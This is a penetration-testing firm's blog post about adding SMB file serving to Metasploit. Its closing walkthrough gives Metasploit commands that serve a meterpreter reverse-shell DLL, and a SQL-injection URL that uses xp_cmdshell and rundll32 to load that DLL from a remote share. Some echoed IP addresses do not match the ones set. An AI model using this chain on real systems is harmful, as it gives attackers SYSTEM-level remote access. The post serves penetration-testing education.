One of the things we like to do at Sec-1 is contribute back to the community wherever possible. As full time Penetration Testers, we often perform Research and Development to identify new vulnerabilities, adding checks to our scanning tools to help organisations highlight areas of concern.
As well as this, we often create tools to aid the rest of our teams and to contribute back to the pen testing and general security community.
Backed by Rapid7, the Metasploit project is the best-known open-source penetration testing tool, used by security companies and enthusiasts world-wide; and aids in penetration tests by providing a framework and collection of modules to allow penetration testers to target systems for potential vulnerabilities.
Whilst on a penetration test for a client, Matt discovered a previously unidentified vulnerability which could be exploited through a single web request by which the target system would then load a Windows Dynamic-Link Library (DLL) file from a remote server. In order to leverage this issue, Matt utilised the Metasploit framework to create an exploit payload in a new file which was then shared via standard Windows file-sharing interface, to be loaded by the target system to gain administrative access.
Unhappy with the clunkiness of this process, Matt investigated if it was possible from within the Metasploit framework itself, to generate a payload and serve the file directly over SMB (the underlying protocol used by Windows File-Sharing); without having to configure a specific share outside of Metasploit. To his surprise, there was no support for serving files over SMB, or any SMB File-Serving support at all within the project (it was possible to be an SMB client, but not a server). This presented an excellent opportunity to add a core protocol support to a widely used project during development of his exploit for the target system.
Working within the Metasploit project over several weekends and late nights, Matt took the steep learning curve to understand the Ruby language which the framework is written in; and with aid of the SMB protocol specifications and packet capturing tools successfully implemented basic file-server support within the framework in a relatively short time frame. Over the course of the next year, he worked with several members of Rapid7 to modify the ‘alpha’ quality code into production ready code which was eventually landed by Rapid7 employee, Juan Vasquez.
This contribution has been highlighted by the Metasploit project as the longest running pull request in the projects’ decade long history, adding support for a core protocol that can be utilised by several exploit modules, in various scenarios by penetration testing teams all around the world.
As an example of how this module can be useful, we will imagine an ASP application resident on a webserver connecting to a backend Microsoft SQL Database, with the ASP application vulnerable to stacked SQL Injection, e.g:
Running sqlmap against the URL above showed that the system is vulnerable to stacked SQL injection, is running as the database system administrator (sa), and the ‘xp_cmdshell’ stored procedure is enabled. With all these items in place, we know that we can use the stored procedure much like a command line interface to run operating system level commands on the target host, with the privileges of SYSTEM. In order to gain further access into the target host, all we need to do now is to request the system to load an arbitrary payload from a remote SMB share. To achieve this, we first use Metasploit to serve a meterpreter payload:
msf > use exploit/windows/smb/generic_smb_dll_injection
msf exploit(generic_smb_dll_injection) > set FILE_NAME exploit.dll
FILE_NAME => exploit.dll
msf exploit(generic_smb_dll_injection) > set SRVHOST 220.127.116.11
SRVHOST => 18.104.22.168
msf exploit(generic_smb_dll_injection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(generic_smb_dll_injection) > set LHOST 22.214.171.124
LHOST => 126.96.36.199
msf exploit(generic_smb_dll_injection) > run
[*] Exploit running as background job.
[*] Started reverse handler on 188.8.131.52:4444
[*] File available on \\184.108.40.206\cmwQz\exploit.dll…
[*] Server started.
With the SMB server ready, all we need to do now is exploit the SQL issue and force the database server to download and run our payload, e.g:
http://www.acmecorps.com/Article.aspx?ID=23; exec master..xp_cmdshell ‘rundll32 \\220.127.116.11\cmwQz\exploit.dll,1’
If the database server is not sufficiently segmented and it is capable of accessing file-shares over the Internet the server will happily load the DLL, bypassing any simple anti-virus systems and a meterpreter session will be created which we can connect to using the ‘sessions’ macro within the Meterpreter console.